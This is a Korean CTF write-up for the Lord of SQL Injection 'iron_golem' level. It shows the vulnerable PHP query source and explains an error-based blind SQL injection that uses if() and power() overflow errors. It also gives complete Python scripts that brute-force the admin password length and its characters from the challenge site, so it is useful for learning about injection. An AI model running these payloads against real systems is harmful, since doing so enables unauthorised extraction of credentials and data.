LOS _Iron_golem

 

<?php
  include "./config.php"; 
  login_chk(); 
  dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/sleep|benchmark/i', $_GET[pw])) exit("HeHe");
  $query = "select id from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysql_fetch_array(mysql_query($query));
  if(mysql_error()) exit(mysql_error());
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysql_fetch_array(mysql_query($query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("iron_golem");
  highlight_file(__FILE__);
?>

소스코드

 

보면 sleep과 benchamrk가 필터링 되어있는데 

time based blind injection을 막아놓은거 같음

이외에는 별다른 필터링이 있지 않음

error page

싱글쿼터 하나만 날려봤는데 에러페이지가 뜬다

이번엔 Error based blind injection인거 같음

 

if문을 사용해 원하는 Error를 놓고 blind injection을 시도하면 됨

난 지수연산 Error를 이용함

power(2,3)은 2^3의 결과를 반환

if(조건, power(2,9999999999),0)을 하면

조건이 참일때 2^9999999999를 반환해서 

DOUBLE value is out of range를 뱉어냄

이걸 이용해서 pw의 길이를 구함

 

import requests
 
url = "https://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
cookie = {"PHPSESSID": ""}
session = requests.Session()
pwLen = 0
pw = ""
 
# Find PW length
for i in range(100):
    params = {
        "pw": "' or id='admin' and if(length(pw)={},power(2,99999999999999),0)#".format(str(i))
    }
    req = session.get(url=url, params=params, cookies=cookie)
    if("range" in req.text):
        print(str(i)+"is correct!!!!!!!")
        pwLen = i
        break
    print(str(i)+"is incorrect")
 

 

pw는 16자

 

혹시 Xavis처럼 유니코드로 되어 있는지 확인

 

pw=' orpw=%27%20or%20id=%27admin%27%20and%20if(length(substr(pw,1,1))=4,power(2,999999999),0)%23

유니코드로 되어있음 

실제 pw는 4자

 

import requests
 
url = "https://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"
cookie = {"PHPSESSID": "1d3jb9ticd96ls0k9ajtms1f85"}
session = requests.Session()
pwLen = 0
pw = ""
 
# Find PW length
for i in range(100):
    params = {
        "pw": "' or id='admin' and if(length(pw)={},power(2,99999999999999),0)#".format(str(i))
    }
    req = session.get(url=url, params=params, cookies=cookie)
    if("range" in req.text):
        print(str(i)+"is correct!!!!!!!")
        pwLen = i
        break
    print(str(i)+"is incorrect")
 
# Find pw
for i in range(1, pwLen//4+1):
    for j in range(0, 256):
        params = {
            "pw": "' or id='admin' and if(ord(substr(pw,{},1))={},power(2,9999999999),0)#".format(str(i), str(j))
        }
        req = session.get(url=url, params=params, cookies=cookie)
        if("range" in req.text):
            print(chr(j)+"is correct!!!!!!!")
            pw += chr(j)
            break
        print(chr(j)+"is incorrect")
 
print("pw is ",pw,"~~~~~~")

 

pw = !!!!

 

Iron_golem Clear